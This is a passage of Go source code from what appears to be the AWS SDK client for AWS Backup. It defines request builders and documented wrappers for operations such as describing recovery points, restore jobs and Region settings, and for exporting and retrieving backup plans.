// See DescribeGlobalSettings for more information on using the DescribeGlobalSettings
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the DescribeGlobalSettingsRequest method.
// req, resp := client.DescribeGlobalSettingsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeGlobalSettings
func (c *Backup) DescribeGlobalSettingsRequest(input *DescribeGlobalSettingsInput) (req *request.Request, output *DescribeGlobalSettingsOutput) {
op := &request.Operation{
Name: opDescribeGlobalSettings,
HTTPMethod: "GET",
HTTPPath: "/global-settings",
}
if input == nil {
input = &DescribeGlobalSettingsInput{}
}
output = &DescribeGlobalSettingsOutput{}
req = c.newRequest(op, input, output)
return
}
// DescribeGlobalSettings API operation for AWS Backup.
//
// Describes the global settings of the AWS account, including whether it is
// opted in to cross-account backup.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DescribeGlobalSettings for usage and error information.
//
// Returned Error Types:
// * InvalidRequestException
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeGlobalSettings
func (c *Backup) DescribeGlobalSettings(input *DescribeGlobalSettingsInput) (*DescribeGlobalSettingsOutput, error) {
req, out := c.DescribeGlobalSettingsRequest(input)
return out, req.Send()
}
// DescribeGlobalSettingsWithContext is the same as DescribeGlobalSettings with the addition of
// the ability to pass a context and additional request options.
//
// See DescribeGlobalSettings for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DescribeGlobalSettingsWithContext(ctx aws.Context, input *DescribeGlobalSettingsInput, opts ...request.Option) (*DescribeGlobalSettingsOutput, error) {
req, out := c.DescribeGlobalSettingsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDescribeProtectedResource = "DescribeProtectedResource"
// DescribeProtectedResourceRequest generates a "aws/request.Request" representing the
// client's request for the DescribeProtectedResource operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DescribeProtectedResource for more information on using the DescribeProtectedResource
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the DescribeProtectedResourceRequest method.
// req, resp := client.DescribeProtectedResourceRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeProtectedResource
func (c *Backup) DescribeProtectedResourceRequest(input *DescribeProtectedResourceInput) (req *request.Request, output *DescribeProtectedResourceOutput) {
op := &request.Operation{
Name: opDescribeProtectedResource,
HTTPMethod: "GET",
HTTPPath: "/resources/{resourceArn}",
}
if input == nil {
input = &DescribeProtectedResourceInput{}
}
output = &DescribeProtectedResourceOutput{}
req = c.newRequest(op, input, output)
return
}
// DescribeProtectedResource API operation for AWS Backup.
//
// Returns information about a saved resource, including the last time it was
// backed up, its Amazon Resource Name (ARN), and the AWS service type of the
// saved resource.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DescribeProtectedResource for usage and error information.
//
// Returned Error Types:
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeProtectedResource
func (c *Backup) DescribeProtectedResource(input *DescribeProtectedResourceInput) (*DescribeProtectedResourceOutput, error) {
req, out := c.DescribeProtectedResourceRequest(input)
return out, req.Send()
}
// DescribeProtectedResourceWithContext is the same as DescribeProtectedResource with the addition of
// the ability to pass a context and additional request options.
//
// See DescribeProtectedResource for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DescribeProtectedResourceWithContext(ctx aws.Context, input *DescribeProtectedResourceInput, opts ...request.Option) (*DescribeProtectedResourceOutput, error) {
req, out := c.DescribeProtectedResourceRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDescribeRecoveryPoint = "DescribeRecoveryPoint"
// DescribeRecoveryPointRequest generates a "aws/request.Request" representing the
// client's request for the DescribeRecoveryPoint operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DescribeRecoveryPoint for more information on using the DescribeRecoveryPoint
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the DescribeRecoveryPointRequest method.
// req, resp := client.DescribeRecoveryPointRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeRecoveryPoint
func (c *Backup) DescribeRecoveryPointRequest(input *DescribeRecoveryPointInput) (req *request.Request, output *DescribeRecoveryPointOutput) {
op := &request.Operation{
Name: opDescribeRecoveryPoint,
HTTPMethod: "GET",
HTTPPath: "/backup-vaults/{backupVaultName}/recovery-points/{recoveryPointArn}",
}
if input == nil {
input = &DescribeRecoveryPointInput{}
}
output = &DescribeRecoveryPointOutput{}
req = c.newRequest(op, input, output)
return
}
// DescribeRecoveryPoint API operation for AWS Backup.
//
// Returns metadata associated with a recovery point, including ID, status,
// encryption, and lifecycle.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DescribeRecoveryPoint for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeRecoveryPoint
func (c *Backup) DescribeRecoveryPoint(input *DescribeRecoveryPointInput) (*DescribeRecoveryPointOutput, error) {
req, out := c.DescribeRecoveryPointRequest(input)
return out, req.Send()
}
// DescribeRecoveryPointWithContext is the same as DescribeRecoveryPoint with the addition of
// the ability to pass a context and additional request options.
//
// See DescribeRecoveryPoint for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DescribeRecoveryPointWithContext(ctx aws.Context, input *DescribeRecoveryPointInput, opts ...request.Option) (*DescribeRecoveryPointOutput, error) {
req, out := c.DescribeRecoveryPointRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDescribeRegionSettings = "DescribeRegionSettings"
// DescribeRegionSettingsRequest generates a "aws/request.Request" representing the
// client's request for the DescribeRegionSettings operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DescribeRegionSettings for more information on using the DescribeRegionSettings
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the DescribeRegionSettingsRequest method.
// req, resp := client.DescribeRegionSettingsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeRegionSettings
func (c *Backup) DescribeRegionSettingsRequest(input *DescribeRegionSettingsInput) (req *request.Request, output *DescribeRegionSettingsOutput) {
op := &request.Operation{
Name: opDescribeRegionSettings,
HTTPMethod: "GET",
HTTPPath: "/account-settings",
}
if input == nil {
input = &DescribeRegionSettingsInput{}
}
output = &DescribeRegionSettingsOutput{}
req = c.newRequest(op, input, output)
return
}
// DescribeRegionSettings API operation for AWS Backup.
//
// Returns the current service opt-in settings for the Region. If service opt-in
// is enabled for a service, AWS Backup tries to protect that service's resources
// in this Region when the resource is included in an on-demand backup or scheduled
// backup plan. Otherwise, AWS Backup does not try to protect that service's
// resources in this Region.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DescribeRegionSettings for usage and error information.
//
// Returned Error Types:
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeRegionSettings
func (c *Backup) DescribeRegionSettings(input *DescribeRegionSettingsInput) (*DescribeRegionSettingsOutput, error) {
req, out := c.DescribeRegionSettingsRequest(input)
return out, req.Send()
}
// DescribeRegionSettingsWithContext is the same as DescribeRegionSettings with the addition of
// the ability to pass a context and additional request options.
//
// See DescribeRegionSettings for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DescribeRegionSettingsWithContext(ctx aws.Context, input *DescribeRegionSettingsInput, opts ...request.Option) (*DescribeRegionSettingsOutput, error) {
req, out := c.DescribeRegionSettingsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
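// Example (illustrative sketch, not generated reference documentation): reading
// the Region's opt-in settings. The ResourceTypeOptInPreference field name is
// assumed here for illustration.
//
//    out, err := svc.DescribeRegionSettings(&backup.DescribeRegionSettingsInput{})
//    if err == nil {
//        for service, optedIn := range out.ResourceTypeOptInPreference {
//            fmt.Printf("%s opted in: %t\n", service, aws.BoolValue(optedIn))
//        }
//    }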
const opDescribeRestoreJob = "DescribeRestoreJob"
// DescribeRestoreJobRequest generates a "aws/request.Request" representing the
// client's request for the DescribeRestoreJob operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DescribeRestoreJob for more information on using the DescribeRestoreJob
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the DescribeRestoreJobRequest method.
// req, resp := client.DescribeRestoreJobRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeRestoreJob
func (c *Backup) DescribeRestoreJobRequest(input *DescribeRestoreJobInput) (req *request.Request, output *DescribeRestoreJobOutput) {
op := &request.Operation{
Name: opDescribeRestoreJob,
HTTPMethod: "GET",
HTTPPath: "/restore-jobs/{restoreJobId}",
}
if input == nil {
input = &DescribeRestoreJobInput{}
}
output = &DescribeRestoreJobOutput{}
req = c.newRequest(op, input, output)
return
}
// DescribeRestoreJob API operation for AWS Backup.
//
// Returns metadata associated with a restore job that is specified by a job
// ID.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DescribeRestoreJob for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * DependencyFailureException
// A dependent AWS service or resource returned an error to the AWS Backup service,
// and the action cannot be completed.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeRestoreJob
func (c *Backup) DescribeRestoreJob(input *DescribeRestoreJobInput) (*DescribeRestoreJobOutput, error) {
req, out := c.DescribeRestoreJobRequest(input)
return out, req.Send()
}
// DescribeRestoreJobWithContext is the same as DescribeRestoreJob with the addition of
// the ability to pass a context and additional request options.
//
// See DescribeRestoreJob for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DescribeRestoreJobWithContext(ctx aws.Context, input *DescribeRestoreJobInput, opts ...request.Option) (*DescribeRestoreJobOutput, error) {
req, out := c.DescribeRestoreJobRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDisassociateRecoveryPoint = "DisassociateRecoveryPoint"
// DisassociateRecoveryPointRequest generates a "aws/request.Request" representing the
// client's request for the DisassociateRecoveryPoint operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DisassociateRecoveryPoint for more information on using the DisassociateRecoveryPoint
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the DisassociateRecoveryPointRequest method.
// req, resp := client.DisassociateRecoveryPointRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DisassociateRecoveryPoint
func (c *Backup) DisassociateRecoveryPointRequest(input *DisassociateRecoveryPointInput) (req *request.Request, output *DisassociateRecoveryPointOutput) {
op := &request.Operation{
Name: opDisassociateRecoveryPoint,
HTTPMethod: "POST",
HTTPPath: "/backup-vaults/{backupVaultName}/recovery-points/{recoveryPointArn}/disassociate",
}
if input == nil {
input = &DisassociateRecoveryPointInput{}
}
output = &DisassociateRecoveryPointOutput{}
req = c.newRequest(op, input, output)
// This operation has no modeled response payload, so swap in a handler that
// discards the response body instead of unmarshaling it.
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// DisassociateRecoveryPoint API operation for AWS Backup.
//
// Deletes the specified continuous backup recovery point from AWS Backup and
// releases control of that continuous backup to the source service, such as
// Amazon RDS. The source service will continue to create and retain continuous
// backups using the lifecycle that you specified in your original backup plan.
//
// Does not support snapshot backup recovery points.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DisassociateRecoveryPoint for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * InvalidResourceStateException
// AWS Backup is already performing an action on this recovery point. It can't
// perform the action you requested until the first action finishes. Try again
// later.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * InvalidRequestException
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DisassociateRecoveryPoint
func (c *Backup) DisassociateRecoveryPoint(input *DisassociateRecoveryPointInput) (*DisassociateRecoveryPointOutput, error) {
req, out := c.DisassociateRecoveryPointRequest(input)
return out, req.Send()
}
// DisassociateRecoveryPointWithContext is the same as DisassociateRecoveryPoint with the addition of
// the ability to pass a context and additional request options.
//
// See DisassociateRecoveryPoint for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DisassociateRecoveryPointWithContext(ctx aws.Context, input *DisassociateRecoveryPointInput, opts ...request.Option) (*DisassociateRecoveryPointOutput, error) {
req, out := c.DisassociateRecoveryPointRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
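// Example (illustrative sketch, not generated reference documentation):
// releasing a continuous backup recovery point back to its source service.
// The vault name and recovery point ARN are placeholder assumptions.
//
//    _, err := svc.DisassociateRecoveryPoint(&backup.DisassociateRecoveryPointInput{
//        BackupVaultName:  aws.String("my-vault"),           // hypothetical vault
//        RecoveryPointArn: aws.String("arn:aws:backup:..."), // hypothetical ARN
//    })
//    if err != nil {
//        log.Println(err) // e.g. InvalidResourceStateException while another action runs
//    }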
const opExportBackupPlanTemplate = "ExportBackupPlanTemplate"
// ExportBackupPlanTemplateRequest generates a "aws/request.Request" representing the
// client's request for the ExportBackupPlanTemplate operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ExportBackupPlanTemplate for more information on using the ExportBackupPlanTemplate
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the ExportBackupPlanTemplateRequest method.
// req, resp := client.ExportBackupPlanTemplateRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ExportBackupPlanTemplate
func (c *Backup) ExportBackupPlanTemplateRequest(input *ExportBackupPlanTemplateInput) (req *request.Request, output *ExportBackupPlanTemplateOutput) {
op := &request.Operation{
Name: opExportBackupPlanTemplate,
HTTPMethod: "GET",
HTTPPath: "/backup/plans/{backupPlanId}/toTemplate/",
}
if input == nil {
input = &ExportBackupPlanTemplateInput{}
}
output = &ExportBackupPlanTemplateOutput{}
req = c.newRequest(op, input, output)
return
}
// ExportBackupPlanTemplate API operation for AWS Backup.
//
// Returns the backup plan that is specified by the plan ID as a backup template.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ExportBackupPlanTemplate for usage and error information.
//
// Returned Error Types:
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ExportBackupPlanTemplate
func (c *Backup) ExportBackupPlanTemplate(input *ExportBackupPlanTemplateInput) (*ExportBackupPlanTemplateOutput, error) {
req, out := c.ExportBackupPlanTemplateRequest(input)
return out, req.Send()
}
// ExportBackupPlanTemplateWithContext is the same as ExportBackupPlanTemplate with the addition of
// the ability to pass a context and additional request options.
//
// See ExportBackupPlanTemplate for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ExportBackupPlanTemplateWithContext(ctx aws.Context, input *ExportBackupPlanTemplateInput, opts ...request.Option) (*ExportBackupPlanTemplateOutput, error) {
req, out := c.ExportBackupPlanTemplateRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opGetBackupPlan = "GetBackupPlan"
// GetBackupPlanRequest generates a "aws/request.Request" representing the
// client's request for the GetBackupPlan operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See GetBackupPlan for more information on using the GetBackupPlan
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the GetBackupPlanRequest method.
// req, resp := client.GetBackupPlanRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupPlan
func (c *Backup) GetBackupPlanRequest(input *GetBackupPlanInput) (req *request.Request, output *GetBackupPlanOutput) {
op := &request.Operation{
Name: opGetBackupPlan,
HTTPMethod: "GET",
HTTPPath: "/backup/plans/{backupPlanId}/",
}
if input == nil {
input = &GetBackupPlanInput{}
}
output = &GetBackupPlanOutput{}
req = c.newRequest(op, input, output)
return
}
// GetBackupPlan API operation for AWS Backup.
//
// Returns BackupPlan details for the specified BackupPlanId. The details are
// the body of a backup plan in JSON format, in addition to plan metadata.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation GetBackupPlan for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupPlan
func (c *Backup) GetBackupPlan(input *GetBackupPlanInput) (*GetBackupPlanOutput, error) {
req, out := c.GetBackupPlanRequest(input)
return out, req.Send()
}
// GetBackupPlanWithContext is the same as GetBackupPlan with the addition of
// the ability to pass a context and additional request options.
//
// See GetBackupPlan for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) GetBackupPlanWithContext(ctx aws.Context, input *GetBackupPlanInput, opts ...request.Option) (*GetBackupPlanOutput, error) {
req, out := c.GetBackupPlanRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opGetBackupPlanFromJSON = "GetBackupPlanFromJSON"
// GetBackupPlanFromJSONRequest generates a "aws/request.Request" representing the
// client's request for the GetBackupPlanFromJSON operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See GetBackupPlanFromJSON for more information on using the GetBackupPlanFromJSON
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the GetBackupPlanFromJSONRequest method.
// req, resp := client.GetBackupPlanFromJSONRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupPlanFromJSON
func (c *Backup) GetBackupPlanFromJSONRequest(input *GetBackupPlanFromJSONInput) (req *request.Request, output *GetBackupPlanFromJSONOutput) {
op := &request.Operation{
Name: opGetBackupPlanFromJSON,
HTTPMethod: "POST",
HTTPPath: "/backup/template/json/toPlan",
}
if input == nil {
input = &GetBackupPlanFromJSONInput{}
}
output = &GetBackupPlanFromJSONOutput{}
req = c.newRequest(op, input, output)
return
}
// GetBackupPlanFromJSON API operation for AWS Backup.
//
// Returns a valid JSON document specifying a backup plan or an error.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation GetBackupPlanFromJSON for usage and error information.
//
// Returned Error Types:
// * LimitExceededException
// A limit in the request has been exceeded; for example, a maximum number of
// items allowed in a request.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * InvalidRequestException
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupPlanFromJSON
func (c *Backup) GetBackupPlanFromJSON(input *GetBackupPlanFromJSONInput) (*GetBackupPlanFromJSONOutput, error) {
req, out := c.GetBackupPlanFromJSONRequest(input)
return out, req.Send()
}
// GetBackupPlanFromJSONWithContext is the same as GetBackupPlanFromJSON with the addition of
// the ability to pass a context and additional request options.
//
// See GetBackupPlanFromJSON for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) GetBackupPlanFromJSONWithContext(ctx aws.Context, input *GetBackupPlanFromJSONInput, opts ...request.Option) (*GetBackupPlanFromJSONOutput, error) {
req, out := c.GetBackupPlanFromJSONRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
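// Example (illustrative sketch, not generated reference documentation): a
// round trip that exports a backup plan as template JSON and parses it back
// into a plan. The plan ID and the BackupPlanTemplateJson field wiring are
// assumptions for illustration.
//
//    tmpl, err := svc.ExportBackupPlanTemplate(&backup.ExportBackupPlanTemplateInput{
//        BackupPlanId: aws.String("plan-id"), // hypothetical plan ID
//    })
//    if err == nil {
//        plan, err := svc.GetBackupPlanFromJSON(&backup.GetBackupPlanFromJSONInput{
//            BackupPlanTemplateJson: tmpl.BackupPlanTemplateJson,
//        })
//        if err == nil {
//            fmt.Println(plan)
//        }
//    }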
const opGetBackupPlanFromTemplate = "GetBackupPlanFromTemplate"
// GetBackupPlanFromTemplateRequest generates a "aws/request.Request" representing the
// client's request for the GetBackupPlanFromTemplate operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See GetBackupPlanFromTemplate for more information on using the GetBackupPlanFromTemplate
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the GetBackupPlanFromTemplateRequest method.
// req, resp := client.GetBackupPlanFromTemplateRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupPlanFromTemplate
func (c *Backup) GetBackupPlanFromTemplateRequest(input *GetBackupPlanFromTemplateInput) (req *request.Request, output *GetBackupPlanFromTemplateOutput) {
op := &request.Operation{
Name: opGetBackupPlanFromTemplate,
HTTPMethod: "GET",
HTTPPath: "/backup/template/plans/{templateId}/toPlan",
}
if input == nil {
input = &GetBackupPlanFromTemplateInput{}
}
output = &GetBackupPlanFromTemplateOutput{}
req = c.newRequest(op, input, output)
return
}
// GetBackupPlanFromTemplate API operation for AWS Backup.
//
// Returns the template specified by its templateId as a backup plan.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation GetBackupPlanFromTemplate for usage and error information.
//
// Returned Error Types:
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupPlanFromTemplate
func (c *Backup) GetBackupPlanFromTemplate(input *GetBackupPlanFromTemplateInput) (*GetBackupPlanFromTemplateOutput, error) {
req, out := c.GetBackupPlanFromTemplateRequest(input)
return out, req.Send()
}
// GetBackupPlanFromTemplateWithContext is the same as GetBackupPlanFromTemplate with the addition of
// the ability to pass a context and additional request options.
//
// See GetBackupPlanFromTemplate for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) GetBackupPlanFromTemplateWithContext(ctx aws.Context, input *GetBackupPlanFromTemplateInput, opts ...request.Option) (*GetBackupPlanFromTemplateOutput, error) {
req, out := c.GetBackupPlanFromTemplateRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opGetBackupSelection = "GetBackupSelection"
// GetBackupSelectionRequest generates a "aws/request.Request" representing the
// client's request for the GetBackupSelection operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See GetBackupSelection for more information on using the GetBackupSelection
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the GetBackupSelectionRequest method.
